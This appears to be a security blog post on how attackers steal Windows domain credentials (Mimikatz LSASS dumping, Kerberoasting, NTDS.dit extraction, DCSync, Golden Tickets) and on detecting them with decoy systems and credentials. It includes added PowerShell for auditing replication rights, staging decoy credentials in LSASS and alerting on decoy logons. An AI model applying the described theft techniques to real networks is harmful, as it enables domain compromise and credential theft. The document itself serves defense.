Today, enterprises tend to use multiple layers of security defenses, ranging from perimeter defenses at network entry points to host-based security solutions deployed on end users' machines, to counter the ever-increasing threats. This includes inline traffic filtering and management security solutions deployed at the access and distribution layers of the network, as well as out-of-band solutions like NAC, SIEM or User Behavior Analysis that provide identity-based network access and give more visibility into users' access to critical network resources. However, layered security defenses face the major and recurring challenge of detecting newer exploitation techniques, as they rely heavily on known behaviors. Another significant challenge facing the enterprise network is detecting post-exploitation activity after perimeter security has been compromised.
After the initial compromise, to execute meaningful attacks, attackers need to steal credentials to move laterally inside the network, access critical network assets and eventually exfiltrate data. They use several sophisticated techniques to perform internal reconnaissance and remote code execution on critical resources, ranging from legitimate operating system tools used to discover network assets to novel code execution techniques on the target. Consequently, differentiating between the legitimate and malicious use of Windows' internal tools and services becomes a high priority for enterprise networks.
To tackle this long-standing problem of detecting lateral movement, enterprise networks must formulate active in-network defense strategies that effectively prevent attackers from accessing critical network resources. Network Deception is one such defensive approach which could prove to be an effective solution for detecting credential theft attacks. Detecting credential stealing attacks with deception essentially requires building the necessary infrastructure: placing decoy systems within the same network as production assets and configuring them with decoy content to lure attackers towards the decoy machines and services. Accurately configuring and tuning the deceptive network can deflect the attacker's lateral movement path towards the deceptive services, so that attackers engage with the deceptive network instead, helping enterprises protect production assets.
MITRE Shield, a knowledge base of active defense techniques maintained by MITRE, highlights many of the methods used in adversary engagement. Some of the techniques described in the MITRE Shield matrix with respect to network deception are as follows:
| MITRE Shield | Description | ATT&CK Technique |
| --- | --- | --- |
| Decoy Account – DTE0010 | A decoy account is created for defensive or deceptive purposes. The decoy account can be used to make a system, service, or software look more realistic or to entice an action. | Account Discovery, Reconnaissance |
| Decoy Credentials – DTE0012 | Seed a target system with credentials (such as username/password, browser tokens, and other forms of authentication data). | Credential Access, Privilege Escalation |
| Decoy Diversity – DTE0013 | Deployment of decoy systems with varying operating systems and software configurations. | Reconnaissance |
| Decoy Network – DTE0014 | Multiple computing resources that can be used for defensive or deceptive purposes. | Initial Access |
| Decoy Persona – DTE0015 | Used to establish background information about a user, in order to have the adversary believe they are operating against real targets. | Initial Access, Discovery, Reconnaissance |
| Decoy System – DTE0017 | Computing resources presented to the adversary in support of active defense. | Reconnaissance |
Over the course of this paper, we will discuss some of the widely adopted credential theft attacks executed by adversaries after the initial compromise, and then move on to the defensive techniques from the MITRE Shield matrix above and how to use them effectively to detect the use of deceptive credentials in the network.
Lateral movement refers to the tools and techniques used by attackers to progressively expand their foothold within an enterprise network after gaining initial access. As shown in the figure below, lateral movement comprises several stages, starting from credential theft, target enumeration and discovery, privilege escalation, gaining access to network resources and eventually remote code execution on the target, before exfiltrating data to accomplish a successful attack. Once inside the network, attackers deploy a range of techniques at each stage of lateral movement to achieve their end goal. One of the primary challenges an attacker faces while moving laterally is hiding their activities in plain sight by generating a minimal volume of legitimate-looking logs, so as to remain undetected. To achieve this, an attacker might choose to embed the tool within a malicious executable or use the operating system's own legitimate tools and services to perform lateral movement operations, consequently making this network traffic harder to distinguish from normal activity.
As per the Verizon DBIR report 2020, over 80% of data breaches involve credential theft attacks. Credential theft is one of the primary tasks attackers need to perform post-exploitation, after gaining initial control of the target machine. It is usually the first step of a lateral movement strategy, allowing attackers to elevate their privileges and acquire access to other network resources. As indicated earlier, attackers have long been abusing legitimate Windows features like SMB, RPC over SMB, Windows Management Instrumentation, Windows Remote Management and many others to perform lateral movement. Figure 1 below highlights where lateral movement falls within the attack chain and its different stages. To remain stealthy, these activities may span a period of many weeks to months.
Figure 1 – Stages of Lateral movement
To distinguish between the admissible and malicious use of these built-in services, it is critical for organizations to deploy advanced threat detection solutions. Over the course of this blog, we will discuss various credential theft techniques used by adversaries during lateral movement. We will also discuss an approach that can be used to effectively detect these techniques inside the network.
Attackers use a variety of tools and techniques to execute credential theft attacks. Many of these tools are open source and readily available on the internet. Operating systems like Windows implement Single Sign-On (SSO) functionality, which requires the user's credentials to be stored in memory, allowing the OS to seamlessly access network resources without repeatedly asking the user to re-enter those credentials. User credentials are stored in memory in a variety of formats like NTLM hashes, reversibly encrypted plaintext, Kerberos tickets, PINs, etc., which can be used to authenticate to services depending upon the supported authentication mechanism. Attackers can acquire these credentials from memory by parsing the appropriate credential storage structures or by using the Windows credential enumeration APIs. Consequently, these attacks pose major security concerns, especially in a domain environment, if the attacker gains access to privileged credentials that can then be reused to access critical network resources. In the following sections, we discuss some of the widely adopted credential stealing techniques used by malware against the Windows operating system. Similar credential stealing techniques can be used against other operating systems as well.
The Local Security Authority Subsystem Service (LSASS) process manages and stores the credentials of all users with active Windows sessions. The credentials stored in LSASS process memory allow users to access other network resources such as file shares, email servers and other remote services without being asked for their credentials again. LSASS process memory stores the credentials in many formats, including reversibly encrypted plaintext, NTLM hashes and Kerberos tickets (Ticket Granting Tickets, etc.). These credentials are generated and stored in the memory of the LSASS process when a user initiates an interactive logon to the machine, such as a console logon or RDP, runs a scheduled task or uses remote administration tools. The encryption and decryption of credentials is done using LsaProtectMemory and LsaUnprotectMemory respectively, and hence a decryption tool using these APIs is able to decrypt LSASS memory buffers and extract them. However, malware needs to execute with local administrator privileges and enable "SeDebugPrivilege" on the current process to be able to access the LSASS process memory.
Below is a code snapshot from one of the famous credential harvesting tools, Mimikatz, enabling the required privileges on the calling thread before dumping the credentials.
Figure 2 – Checking for required privileges
We can see that the NTLM hash of the user's credentials is revealed, and this can be brute forced offline as shown below. Many Windows services, such as SMB, support NTLM authentication, and NTLM hashes can be used directly for authentication, eliminating the need for clear-text passwords.
Figure 3 – Cracking NTLM Hashes offline
Attackers avoid using freely available tools like Mimikatz directly on the target machine to harvest credentials, since these are easily detected by AVs. Instead, they use recompiled clones with minimal functionality to avoid noise. Below is one such instance, where malware embeds recompiled Mimikatz code with only the required functionality.
Figure 4 – Credential extraction tool embedded inside malicious executable
Detection can also be avoided using several "living off the land" mechanisms, available in many post-exploitation frameworks, to execute the credential harvesting tools directly from memory using reflective PE injection, where the binary is never written to disk. Yet another approach is to dump the LSASS process memory using process dumping tools, exfiltrate the dump and extract the credentials offline. Microsoft has documented multiple ways to configure additional LSASS process protection which can prevent credentials from being compromised.
The SAM database is a file on the local hard drive that stores the credentials for all local accounts on the Windows computer. NT hashes for all the accounts on the local machine, including the local administrator credential hash, are stored in the SAM database. The SAM database file is located in %SystemRoot%\System32\config and the credential hashes are exposed through the registry under HKLM\SAM. Attackers need to acquire elevated privileges to access the credentials in the SAM database. The example below demonstrates how the credentials from the SAM database can be revealed through a simple Meterpreter session.
Figure 5 – Dumping SAM database
Windows Credential Manager stores the Web and SMB/RDP credentials of users if they choose to save them on the Windows machine, thereby preventing the authentication mechanism from asking for those passwords again on subsequent logins. These credentials are encrypted with the Windows Data Protection API (DPAPI) function CryptProtectData, using either the current user's logon session or a generated master key, and then saved on the local hard drive. Consequently, any process running in the context of the logged-in user is able to decrypt the credentials using the DPAPI function CryptUnprotectData. In a domain environment, these credentials can be used by attackers to pivot to other systems in the network. The Data Protection APIs provide cryptographic functionality that can be used to securely store credentials and keys. These APIs are used by several other Windows components, such as browsers (IE/Chrome), certificate stores and many other applications. Below is one example of how credential dumping tools like Mimikatz can be used to dump stored Chrome credentials.
Figure 6 – Dumping browser credentials
DPAPI can be abused in multiple ways. In an Active Directory domain-joined environment, if other users have logged into the compromised machine and the malware is running with escalated privileges, it can extract those users' master keys from LSASS memory, which can then be used to decrypt their secrets. Below is a screenshot of how the master key can be extracted using the credential dumping tool.
Figure 7 – Extracting DPAPI Master Key
Malware also tends to use the multiple variants of credential enumeration APIs available within Windows. These APIs can extract credentials from Windows Credential Manager. Below is one instance of malware using the CredEnumerateW API to retrieve credentials and then search for Terminal Services passwords, which it would use to pivot to other systems.
Figure 8 – Extracting credentials using Windows API
In a domain-joined environment, the Kerberos protocol plays a significant role in authentication and in requesting access to services and applications. It provides Single Sign-On functionality for accessing multiple shared resources within the enterprise network. The Kerberos authentication mechanism in Active Directory involves multiple requests and responses, such as those for the Ticket Granting Ticket (TGT) and the Ticket Granting Service (TGS), supported by a Key Distribution Center (KDC), usually a Domain Controller. Upon successful authentication, a user is able to access the respective services.
Attackers gaining access to a domain-joined system usually look for high-value assets like the Active Directory controller, database server, SharePoint server, web server, etc. These services are registered in the domain with specific Service Principal Name (SPN) values, each a unique identifier of a service instance tied to a service account in the domain. Kerberos uses these SPN values to map the service instance to its logon account, allowing the client to authenticate to the respective service. Well-known SPN values are listed out here. Once the attacker is authenticated with any domain user credentials and has the SPN values of services within the domain, they can send a Kerberos Ticket Granting Service request (TGS-REQ) to the Key Distribution Center for the specified SPN value. Details on how SPN values are registered and used in Kerberos authentication are documented here. The TGS response from the KDC contains a Kerberos ticket encrypted with the hash of the service account. This ticket can be extracted from memory and brute forced offline to acquire the service account credentials, allowing a domain user to gain admin-level access to the service.
Kerberoasting is a well-documented attack technique listed in MITRE ATT&CK. It abuses Kerberos authentication by allowing adversaries to request TGS tickets for valid service accounts and brute force the tickets offline to extract the plaintext credentials of those service accounts, consequently enabling them to elevate their privileges from domain user to domain admin. As an initial step in this lateral movement technique, the attacker performs internal reconnaissance to gain information about the services registered in the domain and obtain their SPN values. A simple PowerShell command, after importing the Active Directory PowerShell module as shown below, can issue an LDAP query to the Domain Controller for all user accounts that have an SPN value set.
Figure 9 – PowerShell command to generate LDAP query
Attackers can specifically scan the domain for the MSSQL service through the SPN value registered for its Kerberos authentication. PowerShell scripts like GetUserSPNs can enumerate all user SPNs in the domain, and scripts like Discover-PSMSSQLServers or Invoke-Kerberoast can find the MSSQL services registered in the domain. Following is an example output from the script:
Figure 10 – Kerberoasting PowerShell script output
Once an attacker has the SPN value of the SQL service, a Kerberos Ticket Granting Service Ticket request (TGS-REQ) can be initiated to the domain controller with the SPN value. This can be done by a couple of PowerShell commands generating KRB-TGS-REQ as shown below:
Figure 11 – Kerberos TGS request
Consequently, the Domain Controller sends the TGS-REP containing the service ticket, which is cached in memory and can be extracted by dumping tools like Mimikatz as a .kirbi file. This can be brute forced offline with tgsrepcrack, allowing the attacker to gain unrestricted access to the service with elevated privileges.
As indicated earlier, once an attacker has penetrated the domain network, it is natural for them to progress towards critical assets such as the Active Directory controller. The Active Directory Domain Services (AD DS) database file, Ntds.dit, is one of the most overlooked attack vectors in the domain environment, but it can have significant impact if the attacker is able to gain domain administrative rights, leading to complete domain compromise.
The Ntds.dit file is the authoritative store of credentials for all users in the domain-joined environment. It stores all the information about users, groups and memberships, including the credentials (NT hashes) of all users in the domain along with historical passwords and the users' DPAPI backup master keys. An attacker with domain admin rights can gain access to the Domain Controller's file system and, by dumping and exfiltrating the Ntds.dit file, acquire credentials such as hashes, Kerberos tickets and other reversibly encrypted passwords of all users in the domain. These credentials can then be used to access further resources within the network using techniques like Pass-the-Hash (PTH), since the credentials used across other shared resources could be the same.
Multiple techniques can be used to dump the Ntds.dit file from the Domain Controller, locally as well as remotely, and extract the NTLM hashes and DPAPI backup keys for all domain-joined users. One technique is to create a snapshot with the Volume Shadow Copy Service using the vssadmin command line utility and then extract the Ntds.dit file from the volume shadow copy, as shown below.
Figure 12 – Dumping Volume shadow copy for C drive
Sensitive data in Active Directory is encrypted with the Boot Key (Syskey) stored in the SYSTEM registry hive, so dumping the SYSTEM registry hive is a prerequisite as well for extracting all the credentials.
Publicly available Active Directory auditing frameworks like DSInternals provide PowerShell cmdlets to extract the Syskey from the SYSTEM registry hive and extract all the credentials from the Ntds.dit file.
Ntds.dit also gives access to the most powerful service account within the Active Directory domain, KRBTGT (the Key Distribution Center service account). Acquiring the NTLM hash of this account enables the attacker to execute a Golden Ticket attack, leading to complete domain compromise with unrestricted access to any service on any domain-joined system.
A DCSync attack is a method of credential acquisition which allows an attacker to impersonate a Domain Controller and consequently replicate all Active Directory objects to the impersonating client remotely, without logging on to the DC or dumping the Ntds.dit file. By impersonating the Domain Controller, the attacker can acquire the NTLM hash of the KRBTGT service account, enabling access to all shared resources and applications in the domain-joined environment. To execute this credential stealing technique, an attacker has to compromise a user account holding the required permissions, specifically DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, as shown below.
Figure 13 – User with privileges
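Because DCSync is only possible for principals that hold these replication rights on the domain naming context, a defender's first check is to enumerate who holds them and compare that against the expected set. The following PowerShell is an added example and is not from the original post; it assumes the ActiveDirectory module (RSAT) is installed and that the expected-holder list is a constructed baseline you adjust for your own forest (the well-known rightsGuid values for the replication extended rights come from the AD schema's Extended-Rights container).

```powershell
# Added example (not from the original post): audit which principals hold the
# replication extended rights that DCSync depends on, or GenericAll which implies them.
Import-Module ActiveDirectory

# rightsGuid values of the replication extended rights (AD schema, Extended-Rights container).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    $domain = Get-ADDomain
    $netbios = $domain.NetBIOSName

    # Constructed baseline of principals that legitimately replicate; tune per environment.
    $expectedHolders = @(
        'NT AUTHORITY\SYSTEM',
        'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
        'BUILTIN\Administrators',
        "$netbios\Domain Controllers",
        "$netbios\Enterprise Read-only Domain Controllers"
    )

    # The AD: drive is provided by the ActiveDirectory module; read the domain root ACL.
    $acl = Get-Acl -Path ("AD:\" + $domain.DistinguishedName)

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        $guid   = $ace.ObjectType.ToString().ToLower()
        $right  = $null

        if ($rights -match 'GenericAll') {
            $right = 'GenericAll (implies all replication rights)'
        } elseif ($rights -match 'ExtendedRight') {
            if ($guid -eq '00000000-0000-0000-0000-000000000000') {
                $right = 'All extended rights'          # empty ObjectType = every extended right
            } elseif ($ReplicationRights.ContainsKey($guid)) {
                $right = $ReplicationRights[$guid]
            }
        }
        if (-not $right) { continue }

        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Right     = $right
            Inherited = $ace.IsInherited
            Expected  = ($expectedHolders -contains $ace.IdentityReference.Value)
        }
    }
}

# Unexpected holders sort first; each one is a DCSync-capable identity that needs review.
Get-ReplicationRightHolders | Sort-Object Expected, Principal | Format-Table -AutoSize
```

Run this periodically from a management host and alert on any row where Expected is False; a newly added replication right on the domain root is also a good candidate for a SIEM rule keyed on event ID 5136 (directory object modified) against the domain naming context.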
Once the attacker compromises a user account with the required privileges, a Pass-the-Hash attack can be executed to spawn a command shell with a forged logon session. Credential dumping tools like Mimikatz do this by enumerating all the user logon sessions and replacing the credentials in the current logon session with the stolen username and NTLM hash provided. Behind the scenes, this is done by duplicating the current process's access token, replacing the user credentials pointed to by the duplicated access token, and then using the modified token to start a new process with the stolen credentials, which are subsequently used for network authentication. This is shown below for the example user "DCPrivUser".
Figure 14 – Pass-the-Hash attack
Further, as indicated below, any subsequent NTLM authentication from this logon session uses the stolen credentials to authenticate to domain-joined systems such as the Active Directory controller.
Attackers can now send an AD user-object replication request to the Domain Controller using the Directory Replication Service Remote Protocol (DRSUAPI), the RPC protocol used to replicate AD objects. After a DCERPC bind to the DRSUAPI interface, an RPC call to DRSGetNCChanges replicates the requested user AD objects to the impersonating client. Attackers usually target the KRBTGT account, since acquiring its NTLM hash enables a Golden Ticket attack resulting in unrestricted access to domain services and applications.
Figure 15 – DCSync Attack
As indicated earlier, with the NTLM hash of the KRBTGT account, adversaries can initiate a Golden Ticket attack (Pass-the-Ticket) by injecting forged Kerberos tickets into the current session, which can then be used to authenticate to any service from a client that supports Pass-the-Ticket (for instance, an sqlcmd.exe connection to a DB server, PsExec, etc.).
Figure 16 – Golden ticket with forged Kerberos ticket
The credential theft techniques discussed in the previous sections are just the tip of the iceberg. Adversaries can use many other sophisticated credential stealing techniques that take advantage of system misconfigurations and legitimate administrative tools and protocols while remaining undetected for long periods. Even with SIEMs and other event management solutions used in conjunction with network security solutions, it is a challenge for administrators to distinguish the malicious use of legitimate tools and services during lateral movement from normal activity. Perimeter solutions have limited visibility once the attacker crosses the network boundary and is inside the domain environment. It is critical for organizations to protect and monitor critical network assets like the Domain Controller, database servers, Exchange servers, build systems and other applications or services, as compromising these systems results in significant damage. Therefore, enterprise networks must deploy a solution that detects credential stealing attacks, since stolen credentials are used to pivot to other systems and move laterally once an attacker has established an attack path to a high-value target. If a solution deployed within the critical zones of the network can detect the use of stolen credentials before adversaries reach their target, the critical assets can still be prevented from being compromised.
Network Deception is one such deployment within the domain environment. Using MITRE Shield techniques like decoy systems and networks, decoy credentials, decoy accounts and decoy content, it can help detect lateral movement early in the adversary's attack path to the target asset while reporting significantly lower false detection rates. The idea of deception originates from decades-old honeypot systems but, unlike those, relies more on forging trust and giving adversaries what they are looking for. With its built-in proactiveness, it is configured to lure attackers towards deceptive systems. As shown in the figure below, Network Deception consists of authentic-looking decoy systems placed within the domain network, specifically in the network segments where the critical assets reside. These decoy systems (which could be virtual machines) run a full-fledged OS with configured applications or services, and could replicate crucial services like the Domain Controller, Exchange or DB server, alongside other decoy machines that could lead to those systems. The image below highlights the key foundational aspects of Network Deception.
Figure 17 – Network Deception
As visualized in the figure above, Network Deception comprises the following key elements with respect to deployment in a domain-joined environment:
Since credential theft plays an important role in a successful targeted attack, deception essentially focuses on planting fake credentials on production and decoy endpoints at multiple places within the OS and monitoring the use of these credentials to pivot to other systems. With respect to the network setup, the following are the key aspects; this list is not exhaustive, and much more could be added:
Some of the other setup required for an effective deployment of deception is summarized below:
Figure 18 – Deceptive network setup – Basic requirements
To detect the use of deceptive credentials, setting up decoy machines is an essential part of the solution as well. Primarily, decoy machines should offer the kind of access attackers are looking for during the lateral movement phase. Decoys should also be configured with the relevant auditing enabled so that they generate events. For instance, the following enables account logon events to be audited:
Decoy machines must be set up to run the log collector agent that collects the generated access logs and forwards them to the correlation server. However, in a domain-joined environment, it is also essential to tune the decoy machines to forward only the relevant logs to the correlation server, to minimize false positives.
The figure below highlights some of the auditing that needs to be enabled on the decoy systems for effective correlation.
Figure 19 – Basic decoy setup
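The audit configuration described above can be applied and verified from an elevated PowerShell session on each decoy. The following is an added example, not from the original post; the subcategory names are the English auditpol names (check `auditpol /list /subcategory:*` on a localized build), and the Security log size is a constructed value.

```powershell
# Added example (not from the original post): enable the audit subcategories a decoy
# machine needs so that any use of planted credentials produces a Security event.
$subcategories = @(
    'Logon',                              # 4624 / 4625: interactive and network logons
    'Logoff',                             # 4634 / 4647: session end, useful for dwell time
    'Special Logon',                      # 4672: privileges assigned at logon
    'Other Logon/Logoff Events',          # 4778 / 4779: RDP session connect / disconnect
    'Credential Validation',              # 4776: NTLM validation against this machine
    'Kerberos Authentication Service',    # 4768: TGT requests (meaningful on a decoy DC)
    'Kerberos Service Ticket Operations'  # 4769: TGS requests (meaningful on a decoy DC)
)

foreach ($sub in $subcategories) {
    # Audit both outcomes: a failed attempt with a decoy account is as telling as a success.
    auditpol /set /subcategory:"$sub" /success:enable /failure:enable | Out-Null
    if ($LASTEXITCODE -ne 0) { Write-Warning "Could not enable auditing for '$sub'" }
}

# Keep the Security log from wrapping before the collector agent has shipped the events.
# 256 MB is a constructed value; size it to the decoy's expected event volume.
wevtutil sl Security /ms:268435456

# Show the effective policy so the decoy's state can be checked in by the collector.
auditpol /get /category:"Logon/Logoff"
auditpol /get /category:"Account Logon"
```

If the decoy is domain-joined, an "Advanced Audit Policy Configuration" GPO overrides these local settings, so either apply the same subcategories through the GPO that targets the decoy OU or confirm after a `gpupdate` that the policy shown by `auditpol /get` is still the one intended.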
The following sections describe some examples of how deception can be achieved in the domain network, along with a visualization of how credential theft can be detected.
LSASS process memory is one of the prime targets for attackers, as well as for malware armed with lateral movement capabilities, since it caches a variety of credentials. Credential extraction from the LSASS process requires opening a read handle to the process itself, which is closely monitored by EDR products, but there are stealthier ways around it.
One of the primary tasks in credential-based deception is to stage the deceptive credentials in LSASS process memory. This can be accomplished on production and decoy systems by executing a trivial credential injection program which calls the CreateProcessWithLogonW Windows API with the crafted credentials. CreateProcessWithLogonW creates a new logon session using the caller's access token and spawns the process specified as a parameter in the security context of the supplied deceptive credentials; those credentials stay staged in LSASS memory for as long as the spawned process keeps running in the background. The example code below calls the API with the specified credentials, which are then visible when credentials are extracted with Mimikatz.
Figure 20 – Injecting credentials into LSASS memory
One of the parameters to CreateProcessWithLogonW is dwLogonFlags, which should be set to LOGON_NETCREDENTIALS_ONLY as shown in the code above. This ensures the specified credentials are used only for network authentication and not for local logon. Additionally, NETONLY credentials used to create a logon session are not validated by the system. Below is a code snapshot from the credential extraction tool Mimikatz, which uses a similar approach to forge a logon session and replace its credentials with the supplied ones when executing Pass-the-Hash attacks.
Figure 21 – Mimikatz code for PTH attack
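The staging step above can be scripted without compiling a separate binary by calling CreateProcessWithLogonW through a P/Invoke definition. The following PowerShell is an added example, not the code from Figure 20 or anything from the original post; the decoy account, domain and password are placeholders, and the script assumes it runs in the interactive user's session on the endpoint where the credentials should be staged.

```powershell
# Added example (not from the original post): stage decoy credentials in LSASS by
# creating a NETONLY logon session with CreateProcessWithLogonW, the same API the
# post describes (and the one behind "runas /netonly").
$source = @"
using System;
using System.Runtime.InteropServices;

public static class DecoyLogon
{
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public int cb;
        public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess, hThread;
        public int dwProcessId, dwThreadId;
    }

    // dwLogonFlags value: credentials are used only for outbound network authentication
    // and are not validated locally, so the decoy account does not have to exist here.
    public const uint LOGON_NETCREDENTIALS_ONLY = 0x00000002;
    public const uint CREATE_NO_WINDOW = 0x08000000;

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithLogonW(
        string lpUsername, string lpDomain, string lpPassword, uint dwLogonFlags,
        string lpApplicationName, string lpCommandLine, uint dwCreationFlags,
        IntPtr lpEnvironment, string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
}
"@
Add-Type -TypeDefinition $source

function Start-DecoyCredentialSession {
    param(
        [Parameter(Mandatory)] [string] $User,
        [Parameter(Mandatory)] [string] $Domain,
        [Parameter(Mandatory)] [string] $Password,
        [int] $HoldSeconds = 86400   # how long the credentials stay staged in LSASS
    )
    $si = New-Object 'DecoyLogon+STARTUPINFO'
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object 'DecoyLogon+PROCESS_INFORMATION'

    # The child only sleeps; it exists to keep the NETONLY logon session (and its
    # credentials) alive. When it exits, LSASS discards the session.
    $cmd = "powershell.exe -NoProfile -NonInteractive -Command `"Start-Sleep -Seconds $HoldSeconds`""

    $ok = [DecoyLogon]::CreateProcessWithLogonW(
        $User, $Domain, $Password, [DecoyLogon]::LOGON_NETCREDENTIALS_ONLY,
        $null, $cmd, [DecoyLogon]::CREATE_NO_WINDOW, [IntPtr]::Zero, $null,
        [ref] $si, [ref] $pi)

    if (-not $ok) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw (New-Object ComponentModel.Win32Exception $err)
    }
    # Return the holder PID so the staging can be tracked and torn down later.
    return $pi.dwProcessId
}

# Placeholder decoy identity; use the account actually planted in the decoy domain
# so that a later use of it produces a logon event on the decoy DC.
$holderPid = Start-DecoyCredentialSession -User 'svc_backup_decoy' -Domain 'CORP' -Password 'Placeholder-Pa55'
"Decoy credentials staged; holder process PID $holderPid"
```

Record the holder PID: `Stop-Process -Id $holderPid` retires the decoy credentials, and a scheduled task that re-runs the script at logon keeps them staged across reboots. Because the password is passed in clear text, keep the script itself out of reach of the users whose machines it runs on, and rotate the decoy password whenever an alert fires.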
Attackers or malware moving laterally inside the network may perform reconnaissance for interesting hostnames via nbtstat/nbtscan. To deflect the lateral movement path, decoy systems can be configured with realistic hostnames that match the naming of production systems. These hostnames are then visible in NetBIOS scans, as shown below.
Figure 22 – Deceptive host names pointing to decoy machines
These decoy systems can also run the relevant client applications pointing to the decoy services, with authentication directed to the decoy Domain Controller in the network. Detection of this attack path happens much earlier; the decoy network setup, however, keeps the adversaries engaged, helping admins study their tools and techniques.
Figure 23 – Decoy machines running clients pointing to decoy services
A similar deception setup can also be created for browsers, where saved credentials point to the decoy applications and services within the domain. For instance, Chrome saves credentials on disk in SQLite format, which can be decrypted using DPAPI as discussed in earlier sections. The examples below demonstrate deceptive browser credentials which can lure adversaries towards the decoy services.
Figure 24 – Inserting deceptive browser credentials
In addition to the techniques discussed above and the many others highlighted in previous sections, setting up deception involves much more advanced configuration of decoy systems to minimize false positives, and it needs to be tuned to the environment to accurately identify malicious activity. Deception can also be configured to address other phases of lateral movement, including reconnaissance and target discovery, essentially redirecting adversaries and giving them a path to the target. Below is a high-level visualization of how a decoy network can be made to resemble the domain environment.
Figure 25 – Deception network setup
When one of the domain-joined or public-facing systems is compromised, authentication is attempted to other domain-joined systems in the network. If such an authentication reaches any of the decoy systems and results in a logon, the use of the planted deceptive credentials is a red flag and must be investigated. The visualization below shows the flow and an event being sent to an administrator when one of the decoy systems is accessed.
Figure 26 – Deceptive credentials usage for authentication in the domain
One example of such an event, generated by a successful logon to the decoy system, is shown below:
Figure 27 – Alert sent to administrator on use of deceptive credentials
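The alert above comes from correlating authentication events against the list of planted decoy identities. The following PowerShell is an added example, not the original post's correlation rule; it runs on a decoy (or on the collector against forwarded events) with rights to read the Security log, and the decoy account names are placeholders for the identities you actually planted.

```powershell
# Added example (not from the original post): raise an alert whenever a planted decoy
# account appears in an authentication event on this host.
$DecoyAccounts = @('svc_backup_decoy', 'sqladmin_decoy', 'fileadmin_decoy')   # placeholders

# Event IDs that carry an account name during authentication:
#   4624/4625 logon success/failure, 4776 NTLM validation,
#   4768/4769 Kerberos TGT/TGS requests (only seen on a decoy DC).
$AuthEventIds = 4624, 4625, 4776, 4768, 4769

function Get-EventDataMap {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord] $Record)
    # Flatten the <EventData><Data Name="..."> elements into a hashtable.
    $map = @{}
    $xml = [xml] $Record.ToXml()
    foreach ($d in $xml.Event.EventData.Data) { $map[$d.Name] = $d.'#text' }
    return $map
}

function Find-DecoyCredentialUse {
    param([datetime] $Since = (Get-Date).AddHours(-1))
    $filter  = @{ LogName = 'Security'; Id = $AuthEventIds; StartTime = $Since }
    $records = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    foreach ($r in $records) {
        $d = Get-EventDataMap -Record $r
        $account = $d['TargetUserName']
        if (-not $account) { continue }

        # Normalise 'DOMAIN\user' and 'user@REALM' so a plain name comparison works.
        $name = ($account -split '[\\@]')[0]
        if ($DecoyAccounts -notcontains $name) { continue }

        # 4624 has no Status field; 4776/4768/4769 report 0x0 on success.
        $outcome = 'Success'
        if ($r.Id -eq 4625) { $outcome = 'Failure' }
        elseif ($d['Status'] -and $d['Status'] -ne '0x0') { $outcome = "Failure ($($d['Status']))" }

        # 4776 names the caller in 'Workstation'; the others use IpAddress/WorkstationName.
        $source = if ($d['IpAddress']) { $d['IpAddress'] } else { $d['Workstation'] }

        [pscustomobject]@{
            Time        = $r.TimeCreated
            EventId     = $r.Id
            Account     = $account
            Source      = $source
            Workstation = $d['WorkstationName']
            LogonType   = $d['LogonType']
            Outcome     = $outcome
            Severity    = 'Critical'   # any use of a decoy credential is unexpected by definition
        }
    }
}

# Run once (schedule it, or express the same fields as a SIEM rule) and forward the results.
Find-DecoyCredentialUse | Format-Table -AutoSize
```

Both successes and failures are reported on purpose: a failed NTLM validation (4776 with a non-zero Status) for a decoy account still proves that the planted credential was read from the endpoint where it was staged, and the Source field tells you which host to isolate first.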
The credential theft attacks discussed here are mapped to MITRE ATT&CK as follows:
| Technique ID | Technique Name | Description |
| --- | --- | --- |
| T1003.001 | LSASS Process Memory | Attackers may attempt to access LSASS process memory to extract credentials, as it stores a variety of credentials. Administrative privileges are required to access the process memory. |
| T1003.002 | SAM Database | Stores credentials for all the local user accounts on the machine. Accessing credentials from the SAM database requires SYSTEM-level privileges. |
| T1003.003 | NTDS.dit file | Contains credentials for all the domain users. The file is present on the DC, and domain admin privileges are required to access it. |
| T1003.006 | DCSync | The attacker can extract credentials from the DC by impersonating a domain controller and using the DRSUAPI protocol to replicate credentials from the DC. |
| T1558.001 | Golden Ticket | Attackers who acquire the credentials of the KRBTGT account can forge a Kerberos ticket called a Golden Ticket, allowing them unrestricted access to any system in the domain. |
| T1558.002 | Silver Ticket | Allows the attacker to get admin-level access to the service accounts by abusing Kerberos authentication. |
| T1558.003 | Kerberoasting | Allows attackers to extract the Kerberos tickets for service accounts from memory and brute force them offline to get credentials. |
Just as credential theft plays a significant role in an attacker's lateral movement, in-network defense should play a comparable role for defenders. With lateral movement tactics evolving and getting stealthier, defenders will have to adopt innovative ways of defending critical network assets. In-network defense strategies like deception could prove to be a promising and forward-looking approach to detecting and mitigating credential and data theft attacks. Strategic placement of decoy systems within the production network, planting decoy credentials and decoy content on a carefully selected set of endpoints and decoy systems, and accurately setting up logging and correlation in the SIEM to monitor any use of that decoy content can detect and mitigate attacks early in the lateral movement life cycle.
